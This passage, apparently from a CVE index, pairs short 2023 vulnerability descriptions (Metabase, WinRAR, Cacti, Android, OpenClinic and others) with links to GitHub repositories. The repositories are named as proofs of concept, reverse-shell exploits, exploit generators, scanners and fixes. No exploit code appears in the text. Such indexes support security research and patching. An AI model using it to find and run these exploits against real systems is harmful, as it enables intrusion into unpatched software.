[securezeron/CVE-2023-38646](https://github.com/securezeron/CVE-2023-38646) +- [raytheon0x21/CVE-2023-38646](https://github.com/raytheon0x21/CVE-2023-38646) +- [Zenmovie/CVE-2023-38646](https://github.com/Zenmovie/CVE-2023-38646) +- [shamo0/CVE-2023-38646-PoC](https://github.com/shamo0/CVE-2023-38646-PoC) +- [fidjiw/CVE-2023-38646-POC](https://github.com/fidjiw/CVE-2023-38646-POC) +- [Any3ite/cve-2023-38646-metabase-ReverseShell](https://github.com/Any3ite/cve-2023-38646-metabase-ReverseShell) +- [robotmikhro/CVE-2023-38646](https://github.com/robotmikhro/CVE-2023-38646) +- [kh4sh3i/CVE-2023-38646](https://github.com/kh4sh3i/CVE-2023-38646) +- [yxl2001/CVE-2023-38646](https://github.com/yxl2001/CVE-2023-38646) +- [alexandre-pecorilla/CVE-2023-38646](https://github.com/alexandre-pecorilla/CVE-2023-38646) +- [m3m0o/metabase-pre-auth-rce-poc](https://github.com/m3m0o/metabase-pre-auth-rce-poc) +- [CN016/Metabase-H2-CVE-2023-38646-](https://github.com/CN016/Metabase-H2-CVE-2023-38646-) +- [Boogipop/MetabaseRceTools](https://github.com/Boogipop/MetabaseRceTools) +- [nickswink/CVE-2023-38646](https://github.com/nickswink/CVE-2023-38646) +- [passwa11/CVE-2023-38646](https://github.com/passwa11/CVE-2023-38646) +- [threatHNTR/CVE-2023-38646](https://github.com/threatHNTR/CVE-2023-38646) +- [asepsaepdin/CVE-2023-38646](https://github.com/asepsaepdin/CVE-2023-38646) +- [Pyr0sec/CVE-2023-38646](https://github.com/Pyr0sec/CVE-2023-38646) +- [birdm4nw/CVE-2023-38646](https://github.com/birdm4nw/CVE-2023-38646) +- [AnvithLobo/CVE-2023-38646](https://github.com/AnvithLobo/CVE-2023-38646) +- [Red4mber/CVE-2023-38646](https://github.com/Red4mber/CVE-2023-38646) +- [junnythemarksman/CVE-2023-38646](https://github.com/junnythemarksman/CVE-2023-38646) +- [Mrunalkaran/CVE-2023-38646](https://github.com/Mrunalkaran/CVE-2023-38646) +- [j0yb0y0h/CVE-2023-38646](https://github.com/j0yb0y0h/CVE-2023-38646) +- [Ego1stoo/CVE-2023-38646](https://github.com/Ego1stoo/CVE-2023-38646) +- [0utl4nder/Another-Metabase-RCE-CVE-2023-38646](https://github.com/0utl4nder/Another-Metabase-RCE-CVE-2023-38646) +- [Shisones/MetabaseRCE_CVE-2023-38646](https://github.com/Shisones/MetabaseRCE_CVE-2023-38646) +- [acesoyeo/METABASE-RCE-CVE-2023-38646-](https://github.com/acesoyeo/METABASE-RCE-CVE-2023-38646-) +- [UserConnecting/Exploit-CVE-2023-38646-Metabase](https://github.com/UserConnecting/Exploit-CVE-2023-38646-Metabase) +- [DaniTheHack3r/CVE-2023-38646](https://github.com/DaniTheHack3r/CVE-2023-38646) +- [XiaomingX/cve-2023-38646-poc](https://github.com/XiaomingX/cve-2023-38646-poc) +- [JayRyz/CVE-2023-38646-PoC-Metabase](https://github.com/JayRyz/CVE-2023-38646-PoC-Metabase) + +### CVE-2023-38709 (2024-04-04) + +Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.\n\nThis issue affects Apache HTTP Server: through 2.4.58. + + +- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing) + +### CVE-2023-38743 (2023-09-11) + +Zoho ManageEngine ADManager Plus before Build 7200 allows admin users to execute commands on the host machine. + + +- [PetrusViet/CVE-2023-38743](https://github.com/PetrusViet/CVE-2023-38743) + +### CVE-2023-38817 (2023-10-11) + +An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component. NOTE: the vendor's position is that the reported ability for user-mode applications to execute code as NT AUTHORITY\SYSTEM was "deactivated by Microsoft itself." + + +- [vxcall/kur](https://github.com/vxcall/kur) + +### CVE-2023-38820 +- [TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820](https://github.com/TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820) + +### CVE-2023-38821 +- [TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821](https://github.com/TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821) + +### CVE-2023-38822 +- [TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822](https://github.com/TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822) + +### CVE-2023-38829 (2023-09-11) + +An issue in NETIS SYSTEMS WF2409E v.3.6.42541 allows a remote attacker to execute arbitrary code via the ping and traceroute functions of the diagnostic tools component in the admin management interface. + + +- [adhikara13/CVE-2023-38829-NETIS-WF2409E](https://github.com/adhikara13/CVE-2023-38829-NETIS-WF2409E) +- [Victorique-123/CVE-2023-38829-NETIS-WF2409E_Report](https://github.com/Victorique-123/CVE-2023-38829-NETIS-WF2409E_Report) + +### CVE-2023-38831 (2023-08-23) + +RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file. This was exploited in the wild in April through October 2023. + + +- [BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc](https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc) +- [b1tg/CVE-2023-38831-winrar-exploit](https://github.com/b1tg/CVE-2023-38831-winrar-exploit) +- [IR-HuntGuardians/CVE-2023-38831-HUNT](https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT) +- [Garck3h/cve-2023-38831](https://github.com/Garck3h/cve-2023-38831) +- [ignis-sec/CVE-2023-38831-RaRCE](https://github.com/ignis-sec/CVE-2023-38831-RaRCE) +- [HDCE-inc/CVE-2023-38831](https://github.com/HDCE-inc/CVE-2023-38831) +- [Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE](https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE) +- [knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831](https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831) +- [akhomlyuk/cve-2023-38831](https://github.com/akhomlyuk/cve-2023-38831) +- [PascalAsch/CVE-2023-38831-KQL](https://github.com/PascalAsch/CVE-2023-38831-KQL) +- [ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc](https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc) +- [thegr1ffyn/CVE-2023-38831](https://github.com/thegr1ffyn/CVE-2023-38831) +- [MortySecurity/CVE-2023-38831-Exploit-and-Detection](https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection) +- [z3r0sw0rd/CVE-2023-38831-PoC](https://github.com/z3r0sw0rd/CVE-2023-38831-PoC) +- [sh770/CVE-2023-38831](https://github.com/sh770/CVE-2023-38831) +- [BeniB3astt/CVE-2023-38831_ReverseShell_Winrar](https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar) +- [MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC](https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC) +- [Mich-ele/CVE-2023-38831-winrar](https://github.com/Mich-ele/CVE-2023-38831-winrar) +- [asepsaepdin/CVE-2023-38831](https://github.com/asepsaepdin/CVE-2023-38831) +- [Fa1c0n35/CVE-2023-38831-winrar-exploit](https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit) +- [xaitax/WinRAR-CVE-2023-38831](https://github.com/xaitax/WinRAR-CVE-2023-38831) +- [GOTonyGO/CVE-2023-38831-winrar](https://github.com/GOTonyGO/CVE-2023-38831-winrar) +- [Malwareman007/CVE-2023-38831](https://github.com/Malwareman007/CVE-2023-38831) +- [ameerpornillos/CVE-2023-38831-WinRAR-Exploit](https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit) +- [an040702/CVE-2023-38831](https://github.com/an040702/CVE-2023-38831) +- [elefantesagradodeluzinfinita/cve-2023-38831](https://github.com/elefantesagradodeluzinfinita/cve-2023-38831) +- [malvika-thakur/CVE-2023-38831](https://github.com/malvika-thakur/CVE-2023-38831) +- [ruycr4ft/CVE-2023-38831](https://github.com/ruycr4ft/CVE-2023-38831) +- [Nielk74/CVE-2023-38831](https://github.com/Nielk74/CVE-2023-38831) +- [kehrijksen/CVE-2023-38831](https://github.com/kehrijksen/CVE-2023-38831) +- [h3xecute/SideCopy-Exploits-CVE-2023-38831](https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831) +- [s4m98/winrar-cve-2023-38831-poc-gen](https://github.com/s4m98/winrar-cve-2023-38831-poc-gen) +- [xk-mt/WinRAR-Vulnerability-recurrence-tutorial](https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial) +- [MyStuffYT/CVE-2023-38831-POC](https://github.com/MyStuffYT/CVE-2023-38831-POC) +- [SpamixOfficial/CVE-2023-38831](https://github.com/SpamixOfficial/CVE-2023-38831) +- [r1yaz/winDED](https://github.com/r1yaz/winDED) +- [youmulijiang/evil-winrar](https://github.com/youmulijiang/evil-winrar) +- [solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC](https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC) +- [RomainBayle08/CVE-2023-38831](https://github.com/RomainBayle08/CVE-2023-38831) +- [imbyter/imbyter-WinRAR_CVE-2023-38831](https://github.com/imbyter/imbyter-WinRAR_CVE-2023-38831) +- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo) +- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784) +- [khanhtranngoccva/cve-2023-38831-poc](https://github.com/khanhtranngoccva/cve-2023-38831-poc) +- [MaorBuskila/Windows-X64-RAT](https://github.com/MaorBuskila/Windows-X64-RAT) +- [yezzfusl/cve_2023_38831_scanner](https://github.com/yezzfusl/cve_2023_38831_scanner) +- [FirFirdaus/CVE-2023-38831](https://github.com/FirFirdaus/CVE-2023-38831) +- [ra3edAJ/LAB-DFIR-cve-2023-38831](https://github.com/ra3edAJ/LAB-DFIR-cve-2023-38831) +- [technicalcorp0/CVE-2023-38831-Exploit](https://github.com/technicalcorp0/CVE-2023-38831-Exploit) +- [idkwastaken/CVE-2023-38831](https://github.com/idkwastaken/CVE-2023-38831) +- [RonF98/CVE-2023-38831-POC](https://github.com/RonF98/CVE-2023-38831-POC) +- [VictoriousKnight/CVE-2023-38831_Exploit](https://github.com/VictoriousKnight/CVE-2023-38831_Exploit) +- [kuyrathdaro/winrar-cve-2023-38831](https://github.com/kuyrathdaro/winrar-cve-2023-38831) +- [chaos198800/CVE-2023-38831WinRAR-dai-ma-zhi-xing-lou-dong-fu-xian-zi-yuan-wen-jian](https://github.com/chaos198800/CVE-2023-38831WinRAR-dai-ma-zhi-xing-lou-dong-fu-xian-zi-yuan-wen-jian) + +### CVE-2023-38836 (2023-08-21) + +File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks. + + +- [1337kid/CVE-2023-38836](https://github.com/1337kid/CVE-2023-38836) + +### CVE-2023-38840 (2023-08-15) + +Bitwarden Desktop 2023.7.0 and below allows an attacker with local access to obtain sensitive information via the Bitwarden.exe process. + + +- [markuta/bw-dump](https://github.com/markuta/bw-dump) + +### CVE-2023-38890 (2023-08-18) + +Online Shopping Portal Project 3.1 allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks. + + +- [akshadjoshi/CVE-2023-38890](https://github.com/akshadjoshi/CVE-2023-38890) + +### CVE-2023-38891 (2023-09-14) + +SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php. + + +- [jselliott/CVE-2023-38891](https://github.com/jselliott/CVE-2023-38891) + +### CVE-2023-39024 +- [BenTheCyberOne/CVE-2023-39024-5-POC](https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC) + +### CVE-2023-39062 (2023-08-28) + +Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php. + + +- [afine-com/CVE-2023-39062](https://github.com/afine-com/CVE-2023-39062) + +### CVE-2023-39063 (2023-09-11) + +Buffer Overflow vulnerability in RaidenFTPD 2.4.4005 allows a local attacker to execute arbitrary code via the Server name field of the Step by step setup wizard. + + +- [AndreGNogueira/CVE-2023-39063](https://github.com/AndreGNogueira/CVE-2023-39063) + +### CVE-2023-39115 (2023-08-16) + +install/aiz-uploader/upload in Campcodes Online Matrimonial Website System Script 3.3 allows XSS via a crafted SVG document. + + +- [Raj789-sec/CVE-2023-39115](https://github.com/Raj789-sec/CVE-2023-39115) + +### CVE-2023-39144 (2023-08-03) + +Element55 KnowMore appliances version 21 and older was discovered to store passwords in plaintext. + + +- [cduram/CVE-2023-39144](https://github.com/cduram/CVE-2023-39144) + +### CVE-2023-39320 (2023-09-08) + +The go.mod toolchain directive, introduced in Go 1.21, can be leveraged to execute scripts and binaries relative to the root of the module when the "go" command was executed within the module. This applies to modules downloaded using the "go" command from the module proxy, as well as modules downloaded directly using VCS software. + + +- [ayrustogaru/cve-2023-39320](https://github.com/ayrustogaru/cve-2023-39320) + +### CVE-2023-39361 (2023-09-05) + +Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [HPT-Intern-Task-Submission/CVE-2023-39361](https://github.com/HPT-Intern-Task-Submission/CVE-2023-39361) + +### CVE-2023-39362 (2023-09-05) + +Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [m3ssap0/cacti-rce-snmp-options-vulnerable-application](https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application) +- [jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc](https://github.com/jakabakos/CVE-2023-39362-cacti-snmp-command-injection-poc) + +### CVE-2023-39526 (2023-08-07) + +PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds. + + +- [dnkhack/fixcve2023_39526_2023_39527](https://github.com/dnkhack/fixcve2023_39526_2023_39527) + +### CVE-2023-39539 (2023-12-06) + +\nAMI AptioV contains a vulnerability in BIOS where a User may cause an unrestricted upload of a PNG Logo file with dangerous type by Local access. A successful exploit of this vulnerability may lead to a loss of Confidentiality, Integrity, and/or Availability. \n\n\n\n\n\n + + +- [AdamWen230/CVE-2023-39539-PoC](https://github.com/AdamWen230/CVE-2023-39539-PoC) + +### CVE-2023-39593 (2024-10-17) + +Insecure permissions in the sys_exec function of MariaDB v10.5 allows authenticated attackers to execute arbitrary commands with elevated privileges. NOTE: this is disputed by the MariaDB Foundation because no privilege boundary is crossed. + + +- [Ant1sec-ops/CVE-2023-39593](https://github.com/Ant1sec-ops/CVE-2023-39593) + +### CVE-2023-39707 (2023-08-25) + +A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add Expense parameter under the Expense section. + + +- [Arajawat007/CVE-2023-39707](https://github.com/Arajawat007/CVE-2023-39707) + +### CVE-2023-39708 (2023-08-28) + +A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section. + + +- [Arajawat007/CVE-2023-39708](https://github.com/Arajawat007/CVE-2023-39708) + +### CVE-2023-39709 (2023-08-28) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Member section. + + +- [Arajawat007/CVE-2023-39709](https://github.com/Arajawat007/CVE-2023-39709) + +### CVE-2023-39710 (2023-09-01) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add Customer section. + + +- [Arajawat007/CVE-2023-39710](https://github.com/Arajawat007/CVE-2023-39710) + +### CVE-2023-39711 (2023-09-07) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Subtotal and Paidbill parameters under the Add New Put section. + + +- [Arajawat007/CVE-2023-39711](https://github.com/Arajawat007/CVE-2023-39711) + +### CVE-2023-39712 (2023-09-08) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Put section. + + +- [Arajawat007/CVE-2023-39712](https://github.com/Arajawat007/CVE-2023-39712) + +### CVE-2023-39714 (2023-09-01) + +Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name, Address, and Company parameters under the Add New Member section. + + +- [Arajawat007/CVE-2023-39714](https://github.com/Arajawat007/CVE-2023-39714) + +### CVE-2023-39725 +- [anky-123/CVE-2023-39725](https://github.com/anky-123/CVE-2023-39725) + +### CVE-2023-40000 (2024-04-16) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through 5.7.\n\n + + +- [rxerium/CVE-2023-40000](https://github.com/rxerium/CVE-2023-40000) +- [quantiom/litespeed-cache-xss-poc](https://github.com/quantiom/litespeed-cache-xss-poc) +- [iveresk/cve-2023-40000](https://github.com/iveresk/cve-2023-40000) + +### CVE-2023-40028 (2023-08-15) + +Ghost is an open source content management system. Versions prior to 5.59.1 are subject to a vulnerability which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder. Version 5.59.1 contains a fix for this issue. All users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028) +- [BBSynapse/CVE-2023-40028](https://github.com/BBSynapse/CVE-2023-40028) +- [0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028](https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028) +- [sudlit/CVE-2023-40028](https://github.com/sudlit/CVE-2023-40028) +- [monke443/CVE-2023-40028-Ghost-Arbitrary-File-Read](https://github.com/monke443/CVE-2023-40028-Ghost-Arbitrary-File-Read) +- [rvizx/CVE-2023-40028](https://github.com/rvizx/CVE-2023-40028) + +### CVE-2023-40031 (2023-08-25) + +Notepad++ is a free and open-source source code editor. Versions 8.5.6 and prior are vulnerable to heap buffer write overflow in `Utf8_16_Read::convert`. This issue may lead to arbitrary code execution. As of time of publication, no known patches are available in existing versions of Notepad++. + + +- [webraybtl/CVE-2023-40031](https://github.com/webraybtl/CVE-2023-40031) + +### CVE-2023-40037 (2023-08-18) + +Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.\n + + +- [mbadanoiu/CVE-2023-40037](https://github.com/mbadanoiu/CVE-2023-40037) + +### CVE-2023-40044 (2023-09-27) + +\nIn WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.  \n\n + + +- [kenbuckler/WS_FTP-CVE-2023-40044](https://github.com/kenbuckler/WS_FTP-CVE-2023-40044) + +### CVE-2023-40084 (2023-12-04) + +In run of MDnsSdListener.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084](https://github.com/Trinadh465/platform_system_netd_AOSP10_r33_CVE-2023-40084) + +### CVE-2023-40109 (2024-02-15) + +In createFromParcel of UsbConfiguration.java, there is a possible background activity launch (BAL) due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. + + +- [uthrasri/CVE-2023-40109](https://github.com/uthrasri/CVE-2023-40109) + +### CVE-2023-40121 (2023-10-27) + +In appendEscapedSQLString of DatabaseUtils.java, there is a possible SQL injection due to unsafe deserialization. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. + + +- [hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_AOSP6_r22_CVE-2023-40121) +- [hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121](https://github.com/hshivhare67/platform_framework_base_android-4.2.2_r1_CVE-2023-40121) + +### CVE-2023-40127 (2023-10-27) + +In multiple locations, there is a possible way to access screenshots due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/Trinadh465/platform_packages_providers_MediaProvider_CVE-2023-40127) +- [Trinadh465/CVE-2023-40127](https://github.com/Trinadh465/CVE-2023-40127) +- [saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127) +- [RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127) +- [RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127) + +### CVE-2023-40133 (2023-10-27) + +In multiple locations of DialogFillUi.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/frame_CVE-2023-40133_136_137](https://github.com/uthrasri/frame_CVE-2023-40133_136_137) + +### CVE-2023-40140 (2023-10-27) + +In android_view_InputDevice_create of android_view_InputDevice.cpp, there is a possible way to execute arbitrary code due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140) +- [hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_AOSP6_r22_CVE-2023-40140) + +### CVE-2023-40275 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. It allows retrieval of patient lists via queries such as findFirstname= to _common/search/searchByAjax/patientslistShow.jsp. + + +- [BugBountyHunterCVE/CVE-2023-40275](https://github.com/BugBountyHunterCVE/CVE-2023-40275) + +### CVE-2023-40276 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An Unauthenticated File Download vulnerability has been discovered in pharmacy/exportFile.jsp. + + +- [BugBountyHunterCVE/CVE-2023-40276](https://github.com/BugBountyHunterCVE/CVE-2023-40276) + +### CVE-2023-40277 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. A Reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the login.jsp message parameter. + + +- [BugBountyHunterCVE/CVE-2023-40277](https://github.com/BugBountyHunterCVE/CVE-2023-40277) + +### CVE-2023-40278 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An Information Disclosure vulnerability has been identified in the printAppointmentPdf.jsp component of OpenClinic GA. By changing the AppointmentUid parameter, an attacker can determine whether a specific appointment exists based on the error message. + + +- [BugBountyHunterCVE/CVE-2023-40278](https://github.com/BugBountyHunterCVE/CVE-2023-40278) + +### CVE-2023-40279 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to main.do. + + +- [BugBountyHunterCVE/CVE-2023-40279](https://github.com/BugBountyHunterCVE/CVE-2023-40279) + +### CVE-2023-40280 (2024-03-19) + +An issue was discovered in OpenClinic GA 5.247.01. An attacker can perform a directory path traversal via the Page parameter in a GET request to popup.jsp. + + +- [BugBountyHunterCVE/CVE-2023-40280](https://github.com/BugBountyHunterCVE/CVE-2023-40280) + +### CVE-2023-40294 (2023-08-14) + +libboron in Boron 2.0.8 has a heap-based buffer overflow in ur_parseBlockI at i_parse_blk.c. + + +- [Halcy0nic/CVE-2023-40294-and-CVE-2023-40295](https://github.com/Halcy0nic/CVE-2023-40294-and-CVE-2023-40295) + +### CVE-2023-40296 (2023-08-14) + +async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in ReceiveFrom and Receive in udpsocket.hpp when processing malformed UDP packets. + + +- [Halcy0nic/CVE-2023-40296](https://github.com/Halcy0nic/CVE-2023-40296) + +### CVE-2023-40297 (-) + +Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component. + + +- [sahar042/CVE-2023-40297](https://github.com/sahar042/CVE-2023-40297) + +### CVE-2023-40361 (2023-10-20) + +SECUDOS Qiata (DOMOS OS) 4.13 has Insecure Permissions for the previewRm.sh daily cronjob. To exploit this, an attacker needs access as a low-privileged user to the underlying DOMOS system. Every user on the system has write permission for previewRm.sh, which is executed by the root user. + + +- [vianic/CVE-2023-40361](https://github.com/vianic/CVE-2023-40361) + +### CVE-2023-40362 (2024-01-12) + +An issue was discovered in CentralSquare Click2Gov Building Permit before October 2023. Lack of access control protections allows remote attackers to arbitrarily delete the contractors from any user's account when the user ID and contractor information is known. + + +- [ally-petitt/CVE-2023-40362](https://github.com/ally-petitt/CVE-2023-40362) + +### CVE-2023-40404 (2023-10-25) + +A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges. + + +- [geniuszly/GenEtherExploit](https://github.com/geniuszly/GenEtherExploit) + +### CVE-2023-40429 (2023-09-26) + +A permissions issue was addressed with improved validation. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to access sensitive user data. + + +- [biscuitehh/cve-2023-40429-ez-device-name](https://github.com/biscuitehh/cve-2023-40429-ez-device-name) + +### CVE-2023-40459 (2023-12-04) + +\n\n\n\n\n\n\n\n\nThe\nACEManager component of ALEOS 4.16 and earlier does not adequately perform\ninput sanitization during authentication, which could potentially result in a\nDenial of Service (DoS) condition for ACEManager without impairing other router\nfunctions. ACEManager recovers from the DoS condition by restarting within ten\nseconds of becoming unavailable.\n\n\n\n\n\n\n + + +- [majidmc2/CVE-2023-40459](https://github.com/majidmc2/CVE-2023-40459) +- [7h3w4lk3r/CVE-2023-40459](https://github.com/7h3w4lk3r/CVE-2023-40459) + +### CVE-2023-40477 (2024-05-03) + +RARLAB WinRAR Recovery Volume Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21233. + + +- [winkler-winsen/Scan_WinRAR](https://github.com/winkler-winsen/Scan_WinRAR) +- [wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC) + +### CVE-2023-40600 (2023-11-30) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Exactly WWW EWWW Image Optimizer. It works only when debug.log is turned on.This issue affects EWWW Image Optimizer: from n/a through 7.2.0.\n\n + + +- [RandomRobbieBF/CVE-2023-40600](https://github.com/RandomRobbieBF/CVE-2023-40600) + +### CVE-2023-40626 (2023-11-29) + +The language file parsing process could be manipulated to expose environment variables. Environment variables might contain sensible information. + + +- [TLWebdesign/Joomla-3.10.12-languagehelper-hotfix](https://github.com/TLWebdesign/Joomla-3.10.12-languagehelper-hotfix) + +### CVE-2023-40868 (2023-09-14) + +Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions. + + +- [MinoTauro2020/CVE-2023-40868](https://github.com/MinoTauro2020/CVE-2023-40868) + +### CVE-2023-40869 (2023-09-14) + +Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and 